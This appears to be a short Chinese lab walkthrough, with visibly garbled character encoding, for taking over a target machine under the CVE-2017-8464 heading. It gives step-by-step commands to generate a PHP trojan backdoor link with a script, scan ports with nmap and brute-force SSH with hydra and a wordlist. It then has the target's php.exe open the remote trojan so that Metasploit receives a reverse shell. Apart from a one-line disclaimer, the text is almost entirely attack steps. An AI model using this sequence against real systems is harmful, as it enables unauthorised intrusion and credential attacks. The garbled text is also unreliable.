Kali Linux之CVE-2017-8464漏洞實(shí)現(xiàn)getshell
聲明:
本分享僅做學(xué)習(xí)交流,請(qǐng)自覺遵守法律法規(guī)!
一、戰(zhàn)略部署
1.1 打開終端,進(jìn)入kali的命令行,并切換路徑至/桌面/cve-? 2017-8464_script/

1.2?使用./secist_script.sh來運(yùn)行腳本程序

1.3?在secist>處輸入數(shù)字1進(jìn)入服務(wù)器通過web方式投遞腳本生成后門,按照提示輸入滲透機(jī)ip地址,和監(jiān)聽端口后回車


1.4 腳本程序?qū)⒆詣?dòng)在后臺(tái)生成一個(gè)php木馬的連接

二、開始攻擊
2.1?新生成的鏈接稍后備用,使用命令Ctrl+Shift+t開啟一個(gè)新的窗口,在新的窗口輸入命令nmap?–sV –T 4 –n –p 1-1000 靶機(jī)ip 對(duì)系統(tǒng)開放端口進(jìn)行掃描

2.2?發(fā)現(xiàn)對(duì)方主機(jī)開放有22/tcp(ssh)和?80/tcp(http)端口,使用命令hydra -l administrator -P /usr/share/wordlists/fasttrack.txt 靶機(jī)IP?ssh對(duì)目標(biāo)端口進(jìn)行暴力破解

2.3?使用命令ssh?administrator@靶機(jī)IP 進(jìn)行遠(yuǎn)程連接

2.4?登陸成功后,進(jìn)入到命令行中,使用命令tasklist?|findstr?httpd查看目標(biāo)服務(wù)器軟件的信息

2.5?使用命令wmic process?where?name="httpd.exe" get processid,executablepath,name查看httpd進(jìn)程運(yùn)行的路徑

2.6?切換到phpwamp\server下尋找php的路徑,繼續(xù)使用findstr來查詢前面nmap掃描獲取到的PHP關(guān)鍵的版本信息(5.6.14)

2.7?進(jìn)入目錄找到php.exe程序,然后使用1.4獲得的木馬連接使用php命令來打開遠(yuǎn)程目錄的快捷方式木馬

三、成功Getshell
3.1?回到msf命令終端,發(fā)現(xiàn)成功回彈了一個(gè)目標(biāo)的shell,使用命令sessions?–I 1進(jìn)行切換

3.2 輸入shell命令即可進(jìn)入終端